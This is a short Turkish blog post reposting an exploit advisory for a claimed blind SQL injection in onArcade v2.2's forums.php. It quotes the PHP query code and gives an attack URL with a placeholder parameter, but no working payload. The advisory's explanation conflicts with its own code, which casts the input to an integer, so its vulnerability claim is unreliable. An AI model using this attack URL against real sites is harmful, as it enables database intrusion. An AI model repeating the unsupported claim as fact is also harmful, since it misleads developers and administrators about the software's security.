onArcade v2.2 Blind SQL Vulnerability

onArcade v2.2 Blind SQL injection açığı bulunmuş olup, açık oluşumu ve kullanımı hakkında bilgiler şu şekilde;

/** 
* @exploit             onArcade v2.2 Blind SQL Vulnerability 
* @version             2.2 tested & Also All versions infacted 
* @author              Cold Zero <- [Cold z3ro] => www.hackteach.org 
* @copyright           27/10/2012 
* @script              http://up.support-ar.com/upload/files/onArcade%20v2.2.zip 
* @vendor              http://www.onarcade.com/ 
*/
 
 
1. [SQl]  
 
In forums.php the GET value of r ($_GET['r']) its only secured to be as a number, 
with function is_numeric($_GET['r']) check it http://php.net/manual/en/function.is-numeric.php 
then as we can use none exist number like 99999999999999 then exploit it 
 
 
error lines => 
 
 
case 'new_reply': 
// get topic or post information 
if (isset($_GET['t']) && is_numeric($_GET['t'])) 
$topic_sql = " 
SELECT 
t.topic_id, t.title AS topic_title, t.replies, t.locked, 
f.forum_id, f.title AS forum_title, f.reply_permission 
FROM 
". $tbl_prefix ."forums_topics AS t 
LEFT JOIN ". $tbl_prefix ."forums AS f ON (f.forum_id = t.forum_id) 
WHERE 
t.topic_id = ". (int) $_GET['t'] ."
LIMIT 1"; 
elseif (isset($_GET['r']) && is_numeric($_GET['r'])) 
$topic_sql = " 
SELECT 
r.title AS reply_title, r.message, 
t.topic_id, t.title AS topic_title, t.replies, t.locked, 
f.forum_id, f.title AS forum_title, f.reply_permission 
FROM 
". $tbl_prefix ."forums_replies AS r 
LEFT JOIN ". $tbl_prefix ."forums_topics AS t ON (r.topic_id = t.topic_id) 
LEFT JOIN ". $tbl_prefix ."forums AS f ON (f.forum_id = t.forum_id) 
WHERE 
r.reply_id = ". (int) $_GET['r'] ."
LIMIT 1"; 
else
no_page(); 
 
[EOF] 
 
 
 
Exploit: 
 
/forums.php?a=new_reply&r=[ Blind SQL ]  
 

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir